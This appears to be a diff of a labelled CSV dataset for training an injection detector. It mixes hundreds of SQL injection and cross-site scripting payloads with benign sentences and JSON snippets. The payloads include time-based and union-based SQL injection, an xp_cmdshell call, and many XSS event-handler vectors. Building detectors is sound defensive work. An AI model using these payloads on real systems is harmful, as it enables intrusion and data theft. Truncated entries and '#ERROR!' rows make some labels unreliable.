mode ) union all select 7589,758",2,SQLi,20894 -; if not((select serverproperty('isintegratedsecur,2,SQLi,11138 -"1%' ) or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,17396 --4108' ) or 3440 = cast ( ( chr ( 113 ) ||chr ( 11,2,SQLi,14168 -"-2149"" ) ) ) or elt ( 1032 = 1032,3623 ) and ( ( (",2,SQLi,21907 -"1"" ) ) and 6240 = ( 'qqpjq'|| ( select case 6240 w",2,SQLi,18383 -"<style>@keyframes x{}</style><multicol style=""anim",1,XSS,3929 -Delete the unnecessary code.,0,normal,22589 -"-2226%"" ) ) union all select 1018,1018,1018,1018--",2,SQLi,13477 -<svg><b onload=alert(1)></b>,1,XSS,6108 -Delete app.,0,normal,23099 +"-6662"" ) ) union all select 6755--",2,SQLi,14672 +<table id=x tabindex=1 onactivate=alert(1)></table,1,XSS,6099 +"1"" or ( select 9173 from ( select count ( * ) ,con",2,SQLi,20253 +"1"" ) ) ) union all select null,null,null,null,null",2,SQLi,15298 +"On the main Settings screen, scroll down and selec",0,normal,25840 +Select practice.,0,normal,24720 +Quickly select dinner.,0,normal,24426 +AND 1=utl_inaddr.get_host_address((SELECT DISTINCT,2,SQLi,11093 +Plant a thriving garden.,0,normal,22706 +Can you help me decide where to eat?,0,normal,23749 +I'm not sure where to find the event venue.,0,normal,23690 +1' or sleep ( 5 ) and 'rpqn' like 'rpqn,2,SQLi,17664 +"1' ) ) ) and elt ( 1210 = 1210,sleep ( 5 ) ) and (",2,SQLi,18089 +"1"" ) where 1793 = 1793",2,SQLi,13222 +"<kbd onmouseup=""alert(1)"">test</kbd>",1,XSS,7478 +<strike onblur=alert(1) tabindex=1 id=x></strike><,1,XSS,2554 +<div onfocusout=alert(1) tabindex=1 id=x></div><in,1,XSS,6978 +"<noscript oncut=""alert(1)"" contenteditable>test</n",1,XSS,8654 +1'+ ( select 'yhcf' where 8367 = 8367,2,SQLi,18845 +"1 or elt ( 6272 = 6272,sleep ( 5 ) ) # klaw",2,SQLi,19381 +"<;A HREF="";http://66.102.7.147/"";>;XSS<;/A>;",1,XSS,1667 +"1"" ) where 7588 = 7588 waitfor delay '0:0:5'--",2,SQLi,21533 +"<section onmousedown=""alert(1)"">test</section>",1,XSS,3840 +Select voyage.,0,normal,24650 +"<del draggable=""true"" ondragend=""alert(1)"">test</d",1,XSS,2584 +"<IMG SRC=javascript:alert(""XSS"")>",1,XSS,803 +"<head><style type=""text/css"">@font-face {font-fami",1,XSS,9182 +1'|| ( select 'tezo' from dual where 4436 = 4436,2,SQLi,17893 +<progress onpointerdown=alert(1)>XSS</progress>,1,XSS,8919 +In 1602 he made his second visit to the French cap,0,normal,26028 +1'|| ( select 'fven' where 1433 = 1433 and 6240 = ,2,SQLi,19391 +ORDER BY 12#,2,SQLi,10285 +1' where 1153 = 1153 or ( select * from ( select (,2,SQLi,15227 +Select your vary.,0,normal,25041 +"<sub onmousemove=""alert(1)"">test</sub>",1,XSS,7966 +1' ) ) as mqnv where 9831 = 9831,2,SQLi,12880 +"{""id"":null,""name"":""aside""}",0,normal,27442 +Select wisely.,0,normal,24478 +-5852 ) as anca where 3574 = 3574 or 3958 = 5536#,2,SQLi,17270 +<template onpointerout=alert(1)>XSS</template>,1,XSS,1813 +Schumer before the Joint Select Committee reconven,0,normal,25703 +<head id=x tabindex=1 onfocus=alert(1)></head>,1,XSS,3530 +or'1=1′,2,SQLi,9986 +Modify text.,0,normal,23093 +"<var onkeyup=""alert(1)"" contenteditable>test</var>",1,XSS,4298 +<script\x20>javascript:alert(1)</script>,1,XSS,603 +"1', ( select ( case when ( 2106 = 2106 ) then ( se",2,SQLi,12303 +<object data=javascript&colon;\u0061&#x6C;&#101%72,1,XSS,907 +Let's discuss where to go for the weekend trip.,0,normal,23925 +"1"" ) and 6537 = dbms_pipe.receive_message ( chr ( ",2,SQLi,21658 +"1%"" ) ) ) and extractvalue ( 7982,concat ( 0x5c,0x",2,SQLi,21244 +"<style>@keyframes slidein {}</style><main style=""a",1,XSS,5043 +));waitfor delay '0:0:5'--,2,SQLi,10363 +"1 ) and elt ( 3138 = 1817,1817 )",2,SQLi,18218 +She chose a unique gift for her best friend.,0,normal,23766 +"1' ) ) and 3202 = like ( 'abcdefg',upper ( hex ( r",2,SQLi,15022 +"<a onmousedown=""alert(1)"">test</a>",1,XSS,3278 +"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,",2,SQLi,10528 +"<strong draggable=""true"" ondragstart=""alert(1)"">te",1,XSS,1762 +did you select the correct one,0,normal,26239 +"-1630' union all select 1971,1971--",2,SQLi,20892 +(SELECT SLEEP(5)),2,SQLi,11140 +1' in boolean mode ) or 7417 = ( select count ( * ,2,SQLi,17394 +1 ) ) or char ( 119 ) ||char ( 100 ) ||char ( 99 ),2,SQLi,14170 +"{""id"":null,""name"":""go""}",0,normal,27404 +Filter rows where relevant.,0,normal,23374 +<image2 onpointerout=alert(1)>XSS</image2>,1,XSS,3931 +Create a memorable moment.,0,normal,22586 +"-8364' ) union all select 4732,4732,4732,4732,4732",2,SQLi,13479 +<summary onpointerup=alert(1)>XSS</summary>,1,XSS,6110 +"{""id"":null,""name"":""fell dog cost""}",0,normal,27186 "<style>@keyframes x{}</style><xss style=""animation",1,XSS,44 -"make_set ( 7729 = 7729,1 )",2,SQLi,13857 -"1%' ) and row ( 6237,7469 ) > ( select count ( * )",2,SQLi,16431 -"-7656"" ) ) ) union all select 3172,3172,3172,3172,",2,SQLi,22045 -"1%' ) ) ) union all select null,null,null,null,nul",2,SQLi,15251 -"<style>@keyframes x{}</style><font style=""animatio",1,XSS,4970 -"{""id"":null,""firstName"":""Angeline"",""lastName"":""Tan""",0,normal,27091 -1' ) where 4683 = 4683 and 3824 = benchmark ( 5000,2,SQLi,17660 -I need to select the right song for the event.,0,normal,23839 -Select a suitable color for your lighting conditio,0,normal,25656 --5064 ) as mzxc where 1889 = 1889 or 1570 = conver,2,SQLi,17704 -"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1",2,SQLi,10604 -Modify the privacy controls.,0,normal,22744 -"-3960"" ) ) union all select 7813,7813,7813,7813,78",2,SQLi,21686 -1 ) where 5598 = 5598 and 3707 = ( select count ( ,2,SQLi,21555 +-9622' ) ) ) order by 1#,2,SQLi,13859 +1 ) as nbno where 9816 = 9816 and 3754 = ( select ,2,SQLi,16429 +select ( case when ( 1082 = 6755 ) then 1082 else ,2,SQLi,22043 +"1%"" ) ) or 8466 = benchmark ( 5000000,md5 ( 0x694a",2,SQLi,15253 +<figure onpointerup=alert(1)>XSS</figure>,1,XSS,4972 +"{""id"":null,""firstName"":""Adsee"",""lastName"":""Wei"",""a",0,normal,27089 +"1"" ) ) as phis where 4420 = 4420 and 3202 = like (",2,SQLi,17658 +1' ) ) as clhk where 4607 = 4607 or ( select 9173 ,2,SQLi,20174 +Select accessories with care to draw attention fro,0,normal,25653 +end and ( ( 'zlsq' = 'zlsq,2,SQLi,17702 +"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1",2,SQLi,10606 +Let's discuss where to go for our day off.,0,normal,23917 +select sleep ( 5 ) and 'mlmu' = 'mlmu,2,SQLi,21684 +Join the tour.,0,normal,22873 "<a/href=""javascript:&#13; javascript:prompt(1)""><i",1,XSS,875 -"<style>@keyframes slidein {}</style><em style=""ani",1,XSS,6878 -select,0,normal,26544 -1 where 7642 = 7642 or 2633 = dbms_pipe.receive_me,2,SQLi,19411 -<iframe id=x tabindex=1 onbeforedeactivate=alert(1,1,XSS,8896 -"<;META HTTP-EQUIV="";Set-Cookie""; Content="";USERID=",1,XSS,1627 -"1"" ) where 4172 = 4172 or ( select * from ( select",2,SQLi,20849 --8325 ) ) as ajxq where 6630 = 6630 union all sele,2,SQLi,17692 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,6880 +word1,0,normal,26541 +-9742 ) where 8409 = 8409 or 3440 = cast ( ( chr (,2,SQLi,19409 +<img2 onpointerout=alert(1)>XSS</img2>,1,XSS,8898 +"<;XSS STYLE="";behavior: url(http://ha.ckers.org/xs",1,XSS,1628 +1'|| ( select 'fraa' from dual where 9140 = 9140 a,2,SQLi,20847 +1 ) where 1185 = 1185 or exp ( ~ ( select * from (,2,SQLi,17690 <audio autoplay controls onvolumechange=alert(1)><,1,XSS,108 -1' ) ) or sleep ( 5 ) #,2,SQLi,13526 -"1 union all select null,null,null,null,null,null,n",2,SQLi,22163 -"1"" or 8421 = ( select count ( * ) from generate_se",2,SQLi,13241 -"Unlike the the Smart Select feature on the Note 7,",0,normal,25222 -1' ) ) and 8594 = ( select 8594 from pg_sleep ( 5 ,2,SQLi,15360 -"-4901' union all select 1536,1536,1536,1536,1536,1",2,SQLi,15958 -1 ) as tkkn where 7832 = 7832 ( select ( case when,2,SQLi,17104 -"<samp onkeydown=""alert(1)"" contenteditable>test</s",1,XSS,2281 -"-->'""/></sCript><svG x="">"" onload=(co\u006efirm)``",1,XSS,9564 +1 ) or sleep ( 5 ),2,SQLi,13528 +"select * from generate_series ( 6468,6468,case whe",2,SQLi,22161 +1' ) as ycsr where 2238 = 2238 and 3707 = ( select,2,SQLi,13243 +Up to 30% off Select Ceiling Fans and Home Décor,0,normal,25219 +1 ) or 7427 = dbms_pipe.receive_message ( chr ( 11,2,SQLi,15362 +"1 ) ) ) procedure analyse ( extractvalue ( 9627,co",2,SQLi,15960 +-4182 ) ) as wkfh where 6145 = 6145 union all sele,2,SQLi,16813 +<img onpointerleave=alert(1)>XSS</img>,1,XSS,2282 +"<SCRIPT/SRC=""http://google.com""></SCRIPT>",1,XSS,9566 &lt;BODY ONLOAD=alert('XSS')&gt;,1,XSS,977 -1'+ ( select 'epza' where 8994 = 8994 and make_set,2,SQLi,18393 -1' ) as mqxb where 6496 = 6496 and 7533 = 7533--,2,SQLi,13644 +1 ) where 1100 = 1100 and sleep ( 5 ) --,2,SQLi,18391 +1' ) where 4298 = 4298,2,SQLi,13646 "&lt;BGSOUND SRC=\""javascript&#058;alert('XSS');\""&",1,XSS,980 --3185' ) ) or 3440 = cast ( ( chr ( 113 ) ||chr ( ,2,SQLi,22194 -"<keygen onmouseout=""alert(1)"">test</keygen>",1,XSS,3820 -"{""id"":null,""firstName"":""Muhd"",""lastName"":""Azirruan",0,normal,26931 -"select * from users where id = 1 or ""1,"" or 1 = 1 ",2,SQLi,11843 --3846%' or 6872 = 6872 and '%' = ',2,SQLi,22377 -Can you help me decide where to eat?,0,normal,23749 -1 where 6100 = 6100 and 2716 = ( select count ( * ,2,SQLi,15702 -<samp onpointerdown=alert(1)>XSS</samp>,1,XSS,5194 -"<IMG SRC=x onpagehide=""alert(String.fromCharCode(8",1,XSS,1180 +"select count ( * ) from all_users t1,all_users t2,",2,SQLi,22192 +<summary id=x tabindex=1 onfocus=alert(1)></summar,1,XSS,3822 +"{""id"":null,""name"":""Turuiemon""}",0,normal,26928 +select * from users where id = '1' + @<@# union se,2,SQLi,11845 +-6912' in boolean mode ) union all select 6012--,2,SQLi,21258 +I need to decide where to go for a swim.,0,normal,23746 +1'|| ( select 'jmhb' where 1794 = 1794 or 4240 = (,2,SQLi,15704 +"<mark oncontextmenu=""alert(1)"">test</mark>",1,XSS,5196 +"<IMG SRC=x onpageshow=""alert(String.fromCharCode(8",1,XSS,1181 "&lt;EMBED SRC=\""data&#58;image/svg+xml;base64,PHN2",1,XSS,1019 -"1%"" ) or 6793 = ( select 6793 from pg_sleep ( 5 ) ",2,SQLi,20547 -"<xmp onmouseleave=""alert(1)"">test</xmp>",1,XSS,2956 -1'+ ( select jidy where 2989 = 2989 procedure anal,2,SQLi,17796 -In order to avoid the intestine strife so common i,0,normal,26005 -If you want to select certain contacts to download,0,normal,26041 -"1%"" ) ) ) order by 1#",2,SQLi,21635 -<image onblur=alert(1) tabindex=1 id=x></image><in,1,XSS,2401 -"<embed onbeforecopy=""alert(1)"" contenteditable>tes",1,XSS,6946 -<pre onpointermove=alert(1)>XSS</pre>,1,XSS,4647 +1' ) rlike ( select * from ( select ( sleep ( 5 ) ,2,SQLi,20545 +"<nobr onbeforecopy=""alert(1)"" contenteditable>test",1,XSS,2957 +1' ) or ( select * from ( select ( sleep ( 5 ) ) ),2,SQLi,17794 +"In reality, only a select few actually get this op",0,normal,26002 +Insert the SIM card into your new phone.,0,normal,22913 +"1"" ) where 4182 = 4182 or exp ( ~ ( select * from ",2,SQLi,21633 +"<style>@keyframes x{}</style><command style=""anima",1,XSS,2402 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,6948 +"<html draggable=""true"" ondragleave=""alert(1)"">test",1,XSS,4649 <body onselectionchange=alert(1)>select some text,1,XSS,101 -1' ) ) ) and 3602 = 1990#,2,SQLi,14199 --2679' ) ) ) or 4747 = dbms_utility.sqlid_to_sqlha,2,SQLi,20169 --5352%' ) ) ) or 2724 in ( ( char ( 113 ) +char ( ,2,SQLi,21561 -Rhodes informed the House of Commons Select Commit,0,normal,25748 -"-2207%' ) ) union all select 3339,3339,3339,3339,3",2,SQLi,21368 -select,0,normal,26549 -"<td onclick=""alert(1)"">test</td>",1,XSS,5426 +1'+ ( select soqk where 5383 = 5383,2,SQLi,14201 +1' ) or 7552 = ( select count ( * ) from rdb$field,2,SQLi,20167 +"{""id"":null,""name"":""Groudon""}",0,normal,27366 +Select the best approach.,0,normal,24292 +1' union all select null--,2,SQLi,18349 +select,0,normal,26546 +<rb onpointerout=alert(1)>XSS</rb>,1,XSS,5428 "<script>alert(""hellox worldss"")</script>&safe=high",1,XSS,950 -"{""id"":null,""firstName"":""Wei"",""lastName"":""Chuan"",""s",0,normal,27355 -"select * from generate_series ( 6468,6468,case whe",2,SQLi,22161 -)) AS 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (,2,SQLi,11184 -"{""id"":null,""firstName"":""Lhq"",""lastName"":""Totheq"",""",0,normal,27116 -<datalist id=x tabindex=1 onactivate=alert(1)></da,1,XSS,5675 -1' ) or 8315 = ( select count ( * ) from sysibm.sy,2,SQLi,17477 -"-1628"" union all select 9189,9189,9189,9189,9189,9",2,SQLi,17806 -ORDER BY 18--,2,SQLi,10260 -#ERROR!,2,SQLi,22544 -"<dir onkeydown=""alert(1)"" contenteditable>test</di",1,XSS,5605 -Let's meet at the café where we first met.,0,normal,23727 -"1', ( select ( case when ( 5777 = 5777 ) then 1 el",2,SQLi,15004 -"First, you can select photos from the Camera Roll ",0,normal,26188 -"admin"" or 1 = 1#",2,SQLi,11420 -"1 ) ) or row ( 1045,7562 ) > ( select count ( * ) ",2,SQLi,18656 -Where's the missing guitar pick?,0,normal,22676 -1'+ ( select ugvj where 2593 = 2593 union all sele,2,SQLi,17540 --3921' ) as audo where 7087 = 7087 or 1755 = 4937-,2,SQLi,12240 -Fleming select lead on account of the smallness of,0,normal,26185 -"{""id"":null,""name"":""community""}",0,normal,27405 -Where's the shaman?,0,normal,23654 +"{""id"":null,""firstName"":""Joel"",""lastName"":""Azul"",""a",0,normal,27354 +"1', ( select ( case when ( 3717 = 3717 ) then 1 el",2,SQLi,22159 +` WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SL,2,SQLi,11186 +"iif ( 7036 = 2370,1,1/0 )",2,SQLi,21605 +<style>:target {transform: rotate(180deg);}</style,1,XSS,5677 +1 ) ) ) or ( select * from ( select ( sleep ( 5 ) ,2,SQLi,20719 +"1%' ) or extractvalue ( 1297,concat ( 0x5c,0x71717",2,SQLi,17804 +ORDER BY 20--,2,SQLi,10262 +"1 or extractvalue ( 1297,concat ( 0x5c,0x7171706a7",2,SQLi,16216 +"<LINK REL=""stylesheet"" HREF=""javascript:alert('');",1,XSS,5607 +Where did you find that peaceful garden?,0,normal,23724 +1 or 2367 = ( select count ( * ) from rdb$fields a,2,SQLi,15006 +"1, ( case when 5514 = 9602 then 1 else null end )",2,SQLi,21309 +select * from users where id = '1' union select ( ,2,SQLi,11422 +"1%"" ) ) and row ( 6237,7469 ) > ( select count ( *",2,SQLi,18654 +Where's the airport?,0,normal,23497 +1 ) ) ) and 3707 = ( select count ( * ) from sysib,2,SQLi,17538 +1' ) as llug where 2244 = 2244 and 3715 in ( ( cha,2,SQLi,12242 +For a brief summary of the options to select in ke,0,normal,26182 +"{""id"":null,""firstName"":""Sharon"",""lastName"":""Khoo"",",0,normal,27250 +1' ) ) and ( select 2* ( if ( ( select * from ( se,2,SQLi,22030 """><iframe src=""javascript:alert(XSS)"">",1,XSS,322 -"<SCRIPT>document.write(""XSS"");</SCRIPT>",1,XSS,1335 -1 ) and 8514 = ( select count ( * ) from domain.do,2,SQLi,13828 -Delete tweet.,0,normal,23082 --4047'|| ( select 'rqta' from dual where 9743 = 97,2,SQLi,15626 -<style>:target {color:red;}</style><colgroup id=x ,1,XSS,8218 -&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&g,1,XSS,1564 -1 ( select ( case when ( 4587 = 4587 ) then regexp,2,SQLi,16125 -Insert fresh batteries into the remote control.,0,normal,22903 -1' ) ) and ( select 2* ( if ( ( select * from ( se,2,SQLi,18637 -"1' ) and make_set ( 8403 = 8403,8899 ) and ( 'ojag",2,SQLi,12823 -<style>:target {color:red;}</style><dd id=x style=,1,XSS,7255 -1 ) where 7588 = 7588 or 7417 = ( select count ( *,2,SQLi,22315 -1 ) ) as xoch where 8765 = 8765 and 3754 = ( selec,2,SQLi,18215 -"1"" and ( 3020 = 3020 ) *6703 and ""itpt"" = ""itpt",2,SQLi,16038 -"1 ) ) or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,15299 -"Open the ""Settings"" menu on your PS4 and select ""D",0,normal,25814 -select ( case when ( 9931 = 3424 ) then 1 else 993,2,SQLi,14286 -<content id=x tabindex=1 onfocusin=alert(1)></cont,1,XSS,4360 -1' or 8315 = ( select count ( * ) from sysibm.syst,2,SQLi,20329 -Select a fitness class to stay active.,0,normal,24223 +"a=""get"";b=""URL"";c=""javascript:"";d=""alert('xss');"";",1,XSS,1336 +"1%"" ) ) union all select null,null,null,null,null,",2,SQLi,16382 +Join team.,0,normal,23079 +-7548 or 2850 = 9666,2,SQLi,15628 +"<noembed oncopy=""alert(1)"" contenteditable>test</n",1,XSS,8220 +&lt;/br style=a:expression(alert())&gt;,1,XSS,1565 +"1%"" ) ) ) and 8148 = like ( 'abcdefg',upper ( hex ",2,SQLi,16117 +Create a captivating story about your travels.,0,normal,22900 +waitfor delay '0:0:5' and ( ( ( 'ozjl' like 'ozjl,2,SQLi,18635 +"-7584' union all select 1132,1132,1132,1132,1132,1",2,SQLi,12825 +"<address onmousemove=""alert(1)"">test</address>",1,XSS,7257 +"-2787' ) ) union all select 1996,1996,1996,1996,19",2,SQLi,22313 +"select * from generate_series ( 9964,9964,case whe",2,SQLi,18213 +"1"" ) where 3943 = 3943 and 8312 = dbms_pipe.receiv",2,SQLi,16040 +"-4970' ) union all select 4625,4625,4625,4625,4625",2,SQLi,15301 +"-7347"" ) ) union all select 4360,4360,4360,4360,43",2,SQLi,18179 +1'+ ( select tzvm where 5145 = 5145 and 4192 = 743,2,SQLi,14288 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,4362 +"1"" rlike ( select ( case when ( 3711 = 3313 ) then",2,SQLi,20199 +Select the perfect venue.,0,normal,24293 ";alert(String.fromCharCode(88,83,83))//\';alert(St",1,XSS,949 -1' ) where 3271 = 3271 and 6055 = ctxsys.drithsx.s,2,SQLi,17680 -<script onblur=alert(1) tabindex=1 id=x></script><,1,XSS,2323 -"1"" and 3754 = ( select upper ( xmltype ( chr ( 60 ",2,SQLi,14214 -""" or """"&""",2,SQLi,11731 -There a number of different animals that you can s,0,normal,25336 --3998' ) ) or 3038 = 3038,2,SQLi,18469 -<style>@keyframes slidein {}</style><button style=,1,XSS,5229 -1'|| ( select 'scba' where 9079 = 9079 and 8635 = ,2,SQLi,18039 -"<output onmouseleave=""alert(1)"">test</output>",1,XSS,5776 -if ( 9770 = 9748 ) select 9770 else drop function ,2,SQLi,19970 -Carefully select your items.,0,normal,24314 -\x27UNION SELECT,2,SQLi,10100 -sleep 50',2,SQLi,11712 -<fieldset id=x tabindex=1 ondeactivate=alert(1)></,1,XSS,4228 -"1' where 2391 = 2391 union all select null,null,nu",2,SQLi,18080 -"{""id"":null,""name"":""CharizardMega Charizard X""}",0,normal,27190 -"select * from generate_series ( 3607,3607,case whe",2,SQLi,14498 -1 where 4468 = 4468 or char ( 75 ) ||char ( 70 ) |,2,SQLi,20116 -1' ) and exp ( ~ ( select * from ( select concat (,2,SQLi,15438 -"1%' ) ) ) and elt ( 3114 = 3114,sleep ( 5 ) ) #",2,SQLi,13356 -select * from users where id = '1' + $+%$ or 1 = 1,2,SQLi,11884 -"select count ( * ) from all_users t1,all_users t2,",2,SQLi,18492 -"1 or row ( 1045,7562 ) > ( select count ( * ) ,con",2,SQLi,19193 -1' where 5455 = 5455 and sleep ( 5 ) --,2,SQLi,17446 -"-5702' ) ) ) union all select 7806,7806,7806,7806,",2,SQLi,21041 --9355' or ( 8459 = 8459 ) *4906 and 'aegf' = 'aegf,2,SQLi,18348 -end and ( ( 'vkle' = 'vkle,2,SQLi,12940 -"<blink onbeforepaste=""alert(1)"" contenteditable>te",1,XSS,6394 -"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10812 -"<style onkeypress=""alert(1)"" contenteditable>test<",1,XSS,5121 -"1%"" ) procedure analyse ( extractvalue ( 9627,conc",2,SQLi,18126 -select * from sysusers,2,SQLi,10032 +"{""id"":null,""firstName"":""Sim"",""lastName"":""Daniel"",""",0,normal,27385 +<style>:target {transform: rotate(180deg);}</style,1,XSS,2324 +"1%"" and 8189 = ( select count ( * ) from sysibm.sy",2,SQLi,14216 +"select * from users where id = 1 or ""?;"" or 1 = 1 ",2,SQLi,11733 +There are two voting rounds to select a new French,0,normal,25333 +-2348 ) as sige where 1639 = 1639 or 3440 = cast (,2,SQLi,21638 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,5231 +"1%"" ) and sleep ( 5 ) and ( ""%"" = """,2,SQLi,18037 +<style>:target {transform: rotate(180deg);}</style,1,XSS,5778 +-6855' ) or 8519 = 9248,2,SQLi,19750 +Randomly select a task.,0,normal,24311 +or%201=1 --,2,SQLi,10102 +select * from users where id = 1 + $+%\ or 1 = 1 -,2,SQLi,11714 +<base onpointerenter=alert(1)>XSS</base>,1,XSS,4230 +1 ) where 7165 = 7165 and sleep ( 5 ) #,2,SQLi,18078 +"{""id"":null,""name"":""Charmeleon""}",0,normal,27188 +"1, ( select ( case when ( 1609 = 1609 ) then waitf",2,SQLi,14500 +1'|| ( select 'rdqv' from dual where 1894 = 1894,2,SQLi,20114 +"1"" ) ) or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ",2,SQLi,15440 +"1%"" and elt ( 3114 = 3114,sleep ( 5 ) ) #",2,SQLi,13358 +admin' ) or '1' = '1'/*,2,SQLi,11886 +-5764 or 3038 = 3038,2,SQLi,18490 +1 and ( select 2* ( if ( ( select * from ( select ,2,SQLi,19191 +1' ) ) or 7552 = ( select count ( * ) from rdb$fie,2,SQLi,17444 +"-9737"" ) ) ) order by 1--",2,SQLi,20930 +"On mobile, select the playlist you want to share, ",0,normal,25846 +( select * from ( select ( sleep ( 5 ) ) ) srmq ) ,2,SQLi,12942 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,6396 +"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10814 +<style>:target {color:red;}</style><noscript id=x ,1,XSS,5123 +"-5748' union all select 1224,1224,1224,1224,1224,1",2,SQLi,18124 +exec master..xp_cmdshell 'net+view',2,SQLi,10034 "<BASE HREF=""javascript:alert('XSS');//"">",1,XSS,293 -"<style>@keyframes x{}</style><frame style=""animati",1,XSS,5240 -"<section draggable=""true"" ondragend=""alert(1)"">tes",1,XSS,8290 -<button onResume=javascript:alert(1)>,1,XSS,9657 -<style>:target {color: red;}</style><sub id=x styl,1,XSS,2505 -Select fly.,0,normal,24648 -AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'vR,2,SQLi,10372 -#ERROR!,2,SQLi,11365 -"<style>@keyframes slidein {}</style><xmp style=""an",1,XSS,7392 -"1"" ) as ypfa where 6128 = 6128",2,SQLi,18483 -"1"" where 1683 = 1683 or ( select * from ( select (",2,SQLi,17763 -"`>ABC<div style=""font-family:'foo'\x3Bx:expression",1,XSS,8955 -"<script onpaste=""alert(1)"" contenteditable>test</s",1,XSS,8282 +"<span oncut=""alert(1)"" contenteditable>test</span>",1,XSS,5242 +<marquee id=x tabindex=1 ondeactivate=alert(1)></m,1,XSS,8292 +<button onRowDelete=javascript:alert(1)>,1,XSS,9659 +<style>:target {color:red;}</style><caption id=x s,1,XSS,2506 +Select bike.,0,normal,24645 +AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP),2,SQLi,10374 +#ERROR!,2,SQLi,11367 +"<HEAD><META HTTP-EQUIV=""CONTENT-TYPE"" CONTENT=""tex",1,XSS,7394 +"1 and elt ( 4249 = 4249,7259 ) -- meef",2,SQLi,18481 +"-2054%"" ) ) ) or 2724 in ( ( char ( 113 ) +char ( ",2,SQLi,17761 +"><iframe%20src=http://google.com""%%203E",1,XSS,8957 +"<summary oncontextmenu=""alert(1)"">test</summary>",1,XSS,8284 "<noscript><img title=""</noscript><img src onerror=",1,XSS,111 -Select your player.,0,normal,24836 -1 ) ) ) and 4386 = utl_inaddr.get_host_address ( c,2,SQLi,16384 -"-2417 ) union all select 2169,2169,2169,2169,2169,",2,SQLi,14811 -&lt;!--[if gte IE 4]&gt;,1,XSS,1418 -1' ) ) as orvy where 7270 = 7270 union all select ,2,SQLi,15187 -""")))))) waitfor delay '0:0:20' /*",2,SQLi,10947 -1 and ascii ( lower ( substring ( ( select top 1 n,2,SQLi,11392 -month,0,normal,23201 -"-7793"" ) ) ) or ( 8459 = 8459 ) *4906 and ( ( ( ""l",2,SQLi,21688 -<textarea id=x tabindex=1 onactivate=alert(1)></te,1,XSS,4078 -"<kbd onkeypress=""alert(1)"" contenteditable>test</k",1,XSS,5357 -1' ) ( select ( case when ( 4587 = 4587 ) then reg,2,SQLi,18127 -"),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitf",2,SQLi,10918 -"<style>@keyframes x{}</style><ul style=""animation-",1,XSS,6561 --7950' ) or 9323 = 9323#,2,SQLi,20323 -"<style>@keyframes x{}</style><col style=""animation",1,XSS,3350 -1 ) ) ) and sleep ( 5 ) and ( ( ( 6618 = 6618,2,SQLi,12522 -1 and char ( 120 ) ||char ( 106 ) ||char ( 117 ) |,2,SQLi,21927 -<menu onpointerenter=alert(1)>XSS</menu>,1,XSS,8438 --2960' or 2163 = 3143--,2,SQLi,14611 -"<input oncontextmenu=""alert(1)"">test</input>",1,XSS,5064 -"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10471 -1 ) ) or char ( 68 ) ||char ( 69 ) ||char ( 97 ) |,2,SQLi,19379 -"-7574%"" ) or 5023 = ctxsys.drithsx.sn ( 5023, ( ch",2,SQLi,15164 -Let's discuss where to go for our day off.,0,normal,23917 -"1"" where 1203 = 1203 union all select null,null,nu",2,SQLi,17475 +Select your course.,0,normal,24833 +1 ) ) as uadn where 9588 = 9588 rlike sleep ( 5 ) ,2,SQLi,16375 +-3378' ) ) or 4493 = utl_inaddr.get_host_address (,2,SQLi,14813 +&lt;META HTTP-EQUIV=&quot;Set-Cookie&quot; Content,1,XSS,1419 +"-1218' union all select 2663,2663,2663,2663--",2,SQLi,15189 +#ERROR!,2,SQLi,10949 +"admin"" or ""1"" = ""1""--",2,SQLi,11394 +Select your dream wedding date.,0,normal,24401 +call regexp_substring ( repeat ( right ( char ( 37,2,SQLi,19234 +"<menu onbeforecopy=""alert(1)"" contenteditable>test",1,XSS,4080 +"<title draggable=""true"" ondragstart=""alert(1)"">tes",1,XSS,5359 +"1' ) ) ) procedure analyse ( extractvalue ( 5840,c",2,SQLi,20463 +"""),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20wait",2,SQLi,10920 +"<data onbeforecopy=""alert(1)"" contenteditable>test",1,XSS,6563 +Insert ink.,0,normal,22812 +"<q oncopy=""alert(1)"" contenteditable>test</q>",1,XSS,3352 +1' ) as zxos where 2745 = 2745,2,SQLi,12524 +1'|| ( select 'pnsw' where 2103 = 2103 union all s,2,SQLi,21925 +"<map onpaste=""alert(1)"" contenteditable>test</map>",1,XSS,8440 +"-6890"" ) ) ) union all select 1115#",2,SQLi,14613 +"<optgroup onbeforecut=""alert(1)"" contenteditable>t",1,XSS,5066 +"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10473 +Select the right words for your speech.,0,normal,24162 +"1"" where 5333 = 5333 and char ( 109 ) ||char ( 79 ",2,SQLi,15166 +"1 or extractvalue ( 1297,concat ( 0x5c,0x7171706a7",2,SQLi,16742 +"1"" rlike ( select * from ( select ( sleep ( 5 ) ) ",2,SQLi,17473 <form onreset=alert(1)><input type=reset>,1,XSS,96 -1 where 4785 = 4785 and 7756 = dbms_utility.sqlid_,2,SQLi,16368 -Kohl's: $50 off select luggage purchases of $200 o,0,normal,25919 -"<rb oncontextmenu=""alert(1)"">test</rb>",1,XSS,2612 -Update the file.,0,normal,22868 -"1) or benchmark(10000000,MD5(1))#",2,SQLi,10099 -",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1",2,SQLi,11011 -Where's the fair?,0,normal,23587 -<dialog id=x tabindex=1 onfocusin=alert(1)></dialo,1,XSS,8412 -"1"" where 7110 = 